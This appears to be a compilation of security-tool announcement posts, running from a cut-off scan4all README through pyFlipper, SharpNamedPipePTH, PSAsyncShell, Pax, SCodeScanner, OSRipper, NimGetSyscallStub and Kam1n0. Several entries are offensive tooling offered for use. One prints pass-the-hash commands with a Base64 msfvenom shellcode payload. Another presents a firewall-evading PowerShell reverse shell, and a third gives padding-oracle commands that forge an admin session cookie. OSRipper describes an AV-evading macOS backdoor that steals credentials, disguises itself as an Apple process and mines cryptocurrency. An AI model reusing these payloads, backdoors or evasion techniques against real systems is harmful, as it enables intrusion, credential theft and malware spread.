    1. Start Elasticsearch (of course, you can also output results the traditional way)
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD/config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh

# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 192.168.0.111 is the target to query
  • Please install nmap yourself before use

Using Help

go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable nmap adaptation and use naabu to scan its internally defined HTTP-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v

Work Plan

  • Integrate web-cache-vulnerability-scanner to implement HTTP smuggling and cache poisoning detection
  • Link with metasploit-framework (on the premise that it is already installed on the system), cooperating with tmux, with the macOS environment linkage as the best practice
  • Integrate more fuzzers, such as linking sqlmap
  • Integrate chromedp to take screenshots of landing pages, detect pure-js and js-framework front-end landing pages, and run the corresponding crawlers (sensitive information detection, page crawling)
  • Integrate nmap-go to improve execution efficiency, dynamically parse the result stream, and integrate it into the current task waterfall
  • Integrate ksubdomain to achieve faster subdomain brute-forcing
  • Integrate spider to find more bugs
  • Semi-automatic fingerprint learning to improve accuracy; specify a fingerprint name and configure it

Q & A

  • How to use a Cookie?
  • libpcap-related questions

more see: discussions

Changelog

  • 2022-07-20 fix and PR nuclei #2301: bug with multiple concurrent instances
  • 2022-07-20 add web cache vulnerability scanner
  • 2022-07-19 PR nuclei #2308 add dsl function: substr aes_cbc
  • 2022-07-19 added DCOM protocol enumeration of network interfaces
  • 2022-06-30 embedded a private build of nuclei-templates (3744 YAML POCs in total); 1. integrated Elasticsearch storage of intermediate results 2. embedded the whole config directory into the program
  • 2022-06-27 optimized fuzzy matching to improve accuracy and robustness; progress on ksubdomain integration
  • 2022-06-24 optimized the fingerprint algorithm; added a work-process diagram
  • 2022-06-23 added the ParseSSl parameter: by default, DNS information in SSL certificates is not deeply analyzed and the DNS names in SSL are not scanned; fixed the bug where .exe was not automatically appended for nmap; fixed the bug where cache files were not size-optimized on Windows
  • 2022-06-22 integrated weak-password detection and password brute-forcing for 11 protocols: ftp, mongodb, mssql, mysql, oracle, postgresql, rdp, redis, smb, ssh, telnet; also improved support for external password dictionaries
  • 2022-06-20 integrated Subfinder for subdomain brute-forcing, enabled with the startup parameter export EnableSubfinder=true (note: very slow after startup); automatic deep drilling of domain information in SSL certificates; allows defining your own dictionaries or setting related switches via config/config.json
  • 2022-06-17 improved the case of one domain with multiple IPs: all IPs are port-scanned and then follow the subsequent scanning workflow
  • 2022-06-15 this version adds several weblogic password dictionaries and webshell dictionaries obtained from past engagements
  • 2022-06-10 completed the integration of nuclei, including, of course, the integration of nuclei templates
  • 2022-06-07 added a similarity algorithm to detect 404 pages
  • 2022-06-07 added a parameter for precise scanning of HTTP URL lists, enabled via the environment variable UrlPrecise=true


pyFlipper - Unofficial Flipper Zero Cli Wrapper Written In Python


Unofficial Flipper Zero cli wrapper written in Python

Functions and characteristics:

  • Flipper serial CLI wrapper
  • Websocket client interface

Setup instructions:

$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Tested on:

  • Python 3.8.10 on Linux 5.4.0 x86_64
  • Python 3.10.5 on Android 12 (Termux + OTGSerial2WebSocket NO ROOT REQUIRED)

Usage/Examples

Connection

from pyflipper import PyFlipper

#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")

#OR

#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")

Power

#Info
info = flipper.power.info()

#Poweroff
flipper.power.off()

#Reboot
flipper.power.reboot()

#Reboot in DFU mode
flipper.power.reboot2dfu()

Update/Backup

#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")

#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")

#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")

Loader

#List installed apps
apps = flipper.loader.list()

#Open app
flipper.loader.open(app_name="Clock")

Flipper Info

#Get flipper date
date = flipper.date.date()

#Get flipper timestamp
timestamp = flipper.date.timestamp()

#Get the processes dict list
ps = flipper.ps.list()

#Get device info dict
device_info = flipper.device_info.info()

#Get heap info dict
heap = flipper.free.info()

#Get free_blocks string
free_blocks = flipper.free.blocks()

#Get bluetooth info
bt_info = flipper.bt.info()

Storage

Filesystem Info

#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")

Explorer

#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")

#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")

#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")

#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")

Files

#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")

#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")

#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")

#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")

#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")

#Write file in one chunk
file = "/ext/bar.txt"

text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.file(file, text)

#Write file using a listener
file = "/ext/foo.txt"

text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.start(file)

time.sleep(2)

flipper.storage.write.send(text_one)

text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)

time.sleep(3)

#Don't forget to stop
flipper.storage.write.stop()

LED/Backlight

#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)

#Set blue led off
flipper.led.blue(value=0)

#Set green led value
flipper.led.green(value=175)

#Set backlight on
flipper.led.backlight_on()

#Set backlight off
flipper.led.backlight_off()

#Turn off led
flipper.led.off()

Vibro

#Set vibro True or False
flipper.vibro.set(True)

#Set vibro on
flipper.vibro.on()

#Set vibro off
flipper.vibro.off()

GPIO

#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)

#Set gpio pin value
flipper.gpio.set(pin_name=PIN_NAME, value=1)

MusicPlayer

#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"

#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)

#Stop loop
flipper.music_player.stop()

#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)

#Beep
flipper.music_player.beep()

#Beep for 5 seconds
flipper.music_player.beep(duration=5)

NFC

#Synchronous default timeout 5 seconds

#Detect NFC
nfc_detected = flipper.nfc.detect()

#Emulate NFC
flipper.nfc.emulate()

#Activate field
flipper.nfc.field()

RFID

#Synchronous default timeout 5 seconds

#Read RFID
rfid = flipper.rfid.read()

SubGhz

#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)

#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")

Infrared

#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")

#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])

#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)

IKEY

#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()

#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

Log

#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()

Debug

#Activate debug mode
flipper.debug.on()

#Deactivate debug mode
flipper.debug.off()

Onewire

#Search
response = flipper.onewire.search()

I2C

#Get
response = flipper.i2c.get()

Input

#Input dump
dump = flipper.input.dump()

#Send input
flipper.input.send("up", "press")

Optimizations

Feel free to contribute in any way

  • Queue Thread orchestrator (check dev branch)
  • Implement all the cli functions
  • Async SubGhz Chat (check dev branch)

License

MIT

Buy me a pint

ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7

ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54

BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat

Contacts

  • Discord: white_rabbit#4124
  • Twitter: @nic_whr
  • GPG: 0x94EDEADC


SharpNamedPipePTH - Pass The Hash To A Named Pipe For Token Impersonation


This project is a C# tool for using Pass-the-Hash authentication on a local named pipe for user impersonation. You need local administrator or SeImpersonatePrivilege rights to use it. There is a blog post with an explanation:

https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/

It is heavily based on the code from the project Sharp-SMBExec.

I faced certain offensive security project situations in the past where I already had the NTLM hash of a low-privileged user account and needed a shell for that user on the currently compromised system - but that was not possible with the public tools available. Imagine two more facts for a situation like that - the NTLM hash could not be cracked, and there was no process of the victim user to execute shellcode in or to migrate into. This may sound like an absurd edge case for some of you, but I experienced it multiple times. In more than one engagement I spent a lot of time searching for the right tool/technique for that specific situation.

My personal goals for a tool/technique were:

  • Fully featured shell or C2-connection as the victim user-account
  • It must also be able to impersonate low-privileged accounts - depending on engagement goals, it might be necessary to access a system as a specific user such as the CEO, HR accounts, SAP administrators or others
  • The tool can be used as a C2 module

Unfortunately, the impersonated user is not allowed network authentication, as the new process uses a restricted impersonation token. So you can only use this technique for local actions as another user.

There are two ways to use SharpNamedPipePTH. Either you can execute a binary (with or without arguments):

SharpNamedPipePTH.exe username:testing hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:C:\windows\system32\cmd.exe

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"
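
For reference, the -enc value in the example above is just the Base64 encoding of a UTF-16LE command string (here "notepad.exe"). A quick way to produce such a payload yourself (a sketch, independent of SharpNamedPipePTH):

import base64

# PowerShell's -EncodedCommand / -enc expects Base64 over UTF-16LE text.
command = "notepad.exe\n"
encoded = base64.b64encode(command.encode("utf-16-le")).decode()
print(encoded)  # bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA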

Or you can execute shellcode as the other user:

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 shellcode:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY21kLmV4ZQA=

This is the Base64-encoded output of msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0.

I'm not happy with the shellcode execution yet, as it currently spawns notepad as the impersonated user and injects shellcode into that new process via a D/Invoke CreateRemoteThread syscall. I'm still looking for a possibility to spawn a process in the background or execute shellcode without needing a process of the target user for memory allocation.



PSAsyncShell - PowerShell Asynchronous TCP Reverse Shell


PSAsyncShell is an Asynchronous TCP Reverse Shell written in pure PowerShell.

Unlike other reverse shells, all the communication and execution flow is done asynchronously, allowing it to bypass some firewalls and some countermeasures against this kind of remote connection.

Additionally, this tool features command history, screen wiping, file uploading and downloading, information splitting through chunks and reverse Base64 URL encoded traffic.
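
To make the traffic-encoding idea concrete, here is a minimal sketch of chunking plus reverse Base64 URL encoding. This is an illustration only; PSAsyncShell itself is pure PowerShell and its exact wire format may differ:

import base64

def encode_chunks(data: bytes, chunk_size: int = 48) -> list:
    """Split data into chunks, Base64-URL-encode each one, then reverse the text."""
    out = []
    for i in range(0, len(data), chunk_size):
        b64 = base64.urlsafe_b64encode(data[i:i + chunk_size]).decode()
        out.append(b64[::-1])  # reversed Base64 URL encoded chunk
    return out

def decode_chunks(chunks) -> bytes:
    """Undo the reversal and Base64-URL-decode each chunk."""
    return b"".join(base64.urlsafe_b64decode(c[::-1]) for c in chunks)

payload = b"whoami /all"
assert decode_chunks(encode_chunks(payload)) == payload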


Requirements

  • PowerShell 4.0 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/PSAsyncShell

Usage

.\PSAsyncShell.ps1 -h

____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/

---------------------- by @JoelGMSec -----------------------

Info: This tool helps you to get a remote shell
over asynchronous TCP to bypass firewalls

Usage: .\PSAsyncShell.ps1 -s -p listen_port
Listen for a new connection from the client

.\PSAsyncShell.ps1 -c server_ip server_port
Connect the client to a PSAsyncShell server

Warning: All info between parts will be sent unencrypted
Download & Upload functions don't use MultiPart

The detailed guide of use can be found at the following link:

https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincrona

License

This project is licensed under the GNU GPL 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Contact

This software does not offer any kind of warranty. Its use is exclusively for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



Pax - CLI Tool For PKCS7 Padding Oracle Attacks


Exploit padding oracles for fun and profit!

Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:

  1. Obtain plaintext for a given piece of CBC encrypted data.
  2. Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption algorithm used by the oracle.

This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.
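
To make the attack concrete, below is a minimal sketch of the core CBC padding-oracle primitive that tools like Pax automate. padding_oracle() is a hypothetical callback that submits a forged ciphertext to the server and returns True when the padding is accepted; real tools add a confirmation step to rule out accidental 0x02 0x02 padding matches:

def recover_block(prev_block: bytes, block: bytes, padding_oracle, bs: int = 16) -> bytes:
    """Recover the plaintext of one CBC block by forging the preceding block."""
    intermediate = bytearray(bs)  # block-cipher output before the CBC XOR
    for pad in range(1, bs + 1):
        pos = bs - pad
        for guess in range(256):
            forged = bytearray(bs)
            forged[pos] = guess
            # Force already-recovered trailing bytes to decrypt to the pad value.
            for k in range(pos + 1, bs):
                forged[k] = intermediate[k] ^ pad
            if padding_oracle(bytes(forged) + block):
                intermediate[pos] = guess ^ pad
                break
    # XOR with the real previous block to get the plaintext.
    return bytes(i ^ p for i, p in zip(intermediate, prev_block))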

As always, this tool should only be used on systems you own and/or have permission to probe!


Installation

Download from releases, or install with Go:

go get -u github.com/liamg/pax/cmd/pax

Example Usage

If you find a suspected oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:

pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

This will hopefully give you some plaintext, perhaps something like:

 {"user_id": 456, "is_admin": false}

It looks like you could elevate your privileges here!

You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:

pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

This will spit out another base64 encoded set of encrypted data, perhaps something like:

dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.

How does this work?

The following are great guides on how this attack works:



SCodeScanner - Stands For Source Code Scanner, Where The User Can Scan The Source Code To Find Critical Vulnerabilities


SCodeScanner stands for Source Code Scanner, where the user can scan source code to find critical vulnerabilities. The main objective of this scanner is to find vulnerabilities inside the source code before the code gets published to production.


Features

  1. Supported PHP Language
  2. Supported YAML Language
  3. Passes results to bug-tracking services like Jira and also Slack (sending files to a group of multiple people at once).
  4. Gives results in JSON format, which can easily be consumed by any other program.
  5. Works with rules. If a rule for a target pattern is not present in the php/yaml directory, we only need to create one.
  6. Rules can scan advanced patterns

Achievements

SCodeScanner received 5 CVEs for finding vulnerabilities in multiple CMS plugins.

  • CVE-2022-1465
  • CVE-2022-1474
  • CVE-2022-1527
  • CVE-2022-1532
  • CVE-2022-1604

How to run?

  • Download the repository -
  • Run pip3 install -r requirements.txt
  • And run python3 scscanner.py --help

Feedback/Improvements

I would love to hear your feedback on this tool. Open an issue if you find any problems. And open a PR if you have something to contribute.

Contact

Utkarsh Agrawal
Website



OSRipper - AV Evading OSX Backdoor And Crypter Framework


OSRipper is a fully undetectable backdoor generator and crypter which specialises in macOS M1 malware. It will also work on Windows, but for now there is no support for it, it is NOT FUD for Windows (yet, at least), and for now I will not focus on Windows.

You can also PM me on Discord (SubGlitch1#2983) for support or to ask for new features.


Features

  • FUD (for macOS)
  • Cloaks itself as an official app (Microsoft, ExpressVPN, etc.)
  • Dumps: sys info, browser history, logins, ssh/aws/azure/gcloud creds, clipboard content, local users, etc. (more on Cedric Owens' swiftbelt)
  • Encrypted communications
  • Rootkit-like Behaviour
  • Every Backdoor generated is entirely unique

Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper




 macOS .apps will look like this on vt

Getting Started

Dependencies

You need Python. If you do not wish to install Python, you can download a compiled release. The Python dependencies are specified in the requirements.txt file.

Since version 1.4 you will need metasploit installed and on PATH so that it can handle the meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Only this

sudo python3 main.py

Contributing

Please feel free to fork and open pull requests. Suggestions/criticism are appreciated as well.

Roadmap

v0.1

  • ✅Get down detection to 0/26 on antiscan.me
  • ✅Add Changelog
  • ✅Daemonise Backdoor
  • ✅Add Crypter
  • ✅Add More Backdoor templates
  • ✅Get down detection to at least 0/68 on VT (for mac malware)

v0.2

  • ✅Add AntiVM
  • [] Implement tor hidden services
  • ✅Add Logger
  • ✅Add Password stealer
  • [] Add KeyLogger
  • ✅Add some new evasion options
  • ✅Add SilentMiner
  • [] Make proper C2 server

v0.3

Coming soon

Help

Just open an issue and I'll make sure to get back to you

Changelog

  • 0.2.1

    • OSRipper will now pull all information from the target and send it to the C2 server over sockets. This includes information like browser history, passwords, system information, keys, etc.
  • 0.1.6

    • The process will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared
  • 0.1.5

    • Added Crypter
  • 0.1.4

    • Added 4th Module
  • 0.1.3

    • Got detection on VT down to 0. Made the process invisible
  • 0.1.2

    • Added 3rd module and listener
  • 0.1.1

    • Initial Release

License

MIT

Acknowledgments

Inspiration, code snippets, etc.

Support

I am very sorry to even write this here, but my finances are not looking good right now. If you appreciate my work, I would be really happy about any donation. You do NOT have to; this is solely optional

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T

Disclaimer

I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.



NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy


Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.

The advantage of grabbing syscalls dynamically is that the signature of the stubs is not included in the file, and you don't have to worry about changing Windows versions.
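
The underlying idea is language-agnostic. As a rough illustration (not the Nim implementation), this Python sketch uses the third-party pefile library to parse a fresh copy of ntdll.dll and pull the syscall number out of each Nt* export, assuming the usual x64 stub prologue mov r10, rcx; mov eax, SSN:

import os, shutil, tempfile
import pefile  # third-party: pip install pefile

# Work on a fresh on-disk copy of ntdll.dll so userland hooks in the
# loaded image do not matter - the same idea NimGetSyscallStub relies on.
src = r"C:\Windows\System32\ntdll.dll"
tmp = os.path.join(tempfile.mkdtemp(), "ntdll_copy.dll")
shutil.copyfile(src, tmp)

pe = pefile.PE(tmp)
image = pe.get_memory_mapped_image()

syscalls = {}
for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
    if not exp.name or not exp.name.startswith(b"Nt"):
        continue
    stub = image[exp.address:exp.address + 8]
    # x64 stub prologue: 4c 8b d1 (mov r10, rcx), b8 <SSN> (mov eax, imm32)
    if stub[:4] == b"\x4c\x8b\xd1\xb8":
        syscalls[exp.name.decode()] = int.from_bytes(stub[4:8], "little")

print(syscalls.get("NtAllocateVirtualMemory"))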

To compile the shellcode execution template run the following:

nim c -d:release ShellcodeInject.nim

The result should look like this:



Kam1n0 - Assembly Analysis Platform


Kam1n0 v2.x is a scalable assembly management and analysis platform. It allows a user to first index a (large) collection of binaries into different repositories and provides different analytic services such as clone search and classification. It supports multi-tenant access and management of assembly repositories using the concept of Application. An application instance contains its own exclusive repository and provides a specialized analytic service. Considering the versatility of reverse engineering tasks, the Kam1n0 v2.x server currently provides three different types of clone-search applications: Asm-Clone, Sym1n0, and Asm2Vec, as well as an executable classification based on Asm2Vec. New application types can be further added to the platform.


A user can create multiple application instances. An application instance can be shared among a specific group of users. The application repository read-write access and on-off status can be controlled by the application owner. Kam1n0 v2.x server can serve the applications concurrently using several shared resource pools.

Kam1n0 was developed by Steven H. H. Ding and Miles Q. Li under the supervision of Benjamin C. M. Fung of the Data Mining and Security Lab at McGill University in Canada. It won the second prize at the Hex-Rays Plug-In Contest 2015. If you find Kam1n0 useful, please cite our paper:

  • S. H. H. Ding, B. C. M. Fung, and P. Charland. Kam1n0: MapReduce-based Assembly Clone Search for Reverse Engineering. In Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (SIGKDD), pages 461-470, San Francisco, CA: ACM Press, August 2016.

  • S. H. H. Ding, B. C. M. Fung, and P. Charland. Asm2Vec: boosting static representation robustness for binary clone search against code obfuscation and compiler optimization. In Proceedings of the 40th IEEE Symposium on Security and Privacy (S&P), 18 pages, San Francisco, CA: IEEE Computer Society, May 2019.

Asm-Clone

Asm-Clone applications try to solve the efficient subgraph search problem (i.e. the subgraph isomorphism problem) for assembly functions (<1.3s average query time and <30ms average index time with 2.3M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below).

  • Application Type: Asm-Clone
  • The original clone search service used in Kam1n0 v1.x.
  • Currently supports Meta-PC, ARM, PowerPC, and TMS320c6 (experimental).
  • Support subgraph clone search within a certain assembly code family.
    • + Good interpretability of the result: breaks down to subgraphs.
    • + Accurate for searching within the given code family.
    • + Good for differentiating various patches or versions of big binaries.
    • - Relatively more sensitive to instruction set changes, optimizations, and obfuscation.
    • - Need to pre-define the syntax of the assembly code language.
    • - Need to have assembly code of the same chosen family in the repository.

 

Sym1n0

Semantic clone search by differentiated fuzz testing and constraint solving. An efficient and scalable dynamic-static hybrid approach (<1s average query time and <100ms average index time with 1.5M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below). Support visualization of abstract syntax graph.

  • Application Type: Sym1n0 (v2 only)
  • Clone search by both symbolic execution and concrete execution.
  • Differentiate functions based on their different I/O behavior.
  • Clone search conducted on the abstract syntax graph constructed from Vex IR (powered by LibVex).
    • + Clone search across different assembly code families.
      • For example, indexed x86 binaries but the query is ARM code.
    • + Subgraph clone search.
    • + Supports a wide range of families through LibVex.
      • x86, AMD64, MIPS32, MIPS64, PowerPC32, PowerPC64, ARM32, and ARM64.
    • + An efficient dynamic-static hybrid approach.
    • + Ideal for analyzing firmware compiled for different processors.
    • - Sensitive to heavy graph manipulation (such as a full flattening).
    • - Sensitive to large scale breakdown of basic block integrity.

 

Asm2Vec

Asm2Vec leverages representation learning. It understands the lexical semantic relationship of assembly code. For example, xmm* registers are semantically related to vector operations such as addps. memcpy is similar to strcpy. The graph below shows different assembly functions compiled from the same source code of gmpz_tdiv_r_2exp in libgmp. From left to right, the assembly functions are compiled with the GCC O0 option, the GCC O3 option, the O-LLVM obfuscator Control Flow Graph Flattening option, and the LLVM obfuscator Bogus Control Flow Graph option. Asm2Vec can statically identify them as clones.

  • Leverage representation learning.
  • Understand the lexical semantic relationship of assembly code.
    • + State-of-the-art for clone search against heavy code obfuscation techniques.
      • (>0.8 accuracy for all options applied in O-LLVM, multiple iterations).
    • + State-of-the-art for clone search against code optimization.
      • (>0.8 accuracy between O0 and O3, >0.94 accuracy between O2 and O3)
    • + Even better result than the most recent dynamic approach.
    • + Much more efficient than recent dynamic approaches.
    • + Do not need to define the architecture. It self-learns by reading large volume of code.
    • + Static approach: efficient and scalable.
    • - No subgraphs.
    • - Assumes the assembly code comes from the same processor family.
    • - Static approach: cannot recognize jump table, etc.

 

Executable Classification

In this application, the user defines a set of software classes based on functional relatedness and provides binaries belonging to each class. The system then automatically groups functions into clusters in which functions are connected directly or indirectly by a clone relation. The clusters that are discriminative for the classification are kept and serve as signatures of their classes. Given a target binary, the system shows the degree to which it belongs to each software class.


  • Use Asm2Vec as its function similarity computation model

    • + Provide interpretable classification results.
    • + Learn common characteristics (i.e., function clusters) of each class.
    • + Able to handle smaller and imbalanced datasets than an ordinary machine learning model.
    • - The limitation is that the assumption that binaries in the same class share some common functions must hold for the system to work.

     

Platform Overview

The figure below shows the major UI components and functionalities of Kam1n0 v2.x. We adopt a material design. In general, each user has an application list, a running-job list, and a result file list.

  • Application list shows the application instances owned by the user and shared by the others.
  • Running-job list shows the running progress for a large query (such as chrome.dll) and indexing procedure.
  • Result file list displays the saved results. More details of the UI design can be found in our detailed tutorial.


Installation Instruction

The current release of Kam1n0 consists of two installers: the core server and IDA Pro plug-in.

Kam1n0-Server.msi includes:
  • Core engine: Main engine providing the service for indexing and searching.
  • Workbench: A user interface to manage the repositories and running services.
  • Web user interface: Web user interface for searching/indexing binary files and assembly functions.
  • Visual C++ redistributable for VS 15: Dependency for z3.

Kam1n0-IDA-Plugin.msi includes:
  • Plug-in: Connectors and user interface.
  • PyPI wheels for Cefpython: Rendering engine for the user interface.
  • PyPI and dependent wheels: Package management for Python. Included for IDA 6.8 & 6.9.

Installing the Kam1n0 Server

The Kam1n0 core engine is purely written in Java. You need the following dependencies:

  • [Required] The latest x64 11.x JRE/JDK distribution from Oracle.
  • [Optional] The latest version of IDA Pro with the idapython plug-in installed. The Python plug-in and runtime should have already been installed with IDA Pro. Reinstall IDA Pro if necessary.

Download the Kam1n0-Server.msi file from our release page. Follow the instructions to install the server. You will be prompted to select an installation path. IDA Pro is optional if the server does not have to deal with any disassembling; in other words, if the client side uses the Kam1n0 plugin for IDA Pro. It is strongly suggested to have IDA Pro installed with the Kam1n0 server. The Kam1n0 server will automatically detect your IDA Pro installation by looking for the default application used to open .i64 files.

Installing the IDA Pro Plug-in

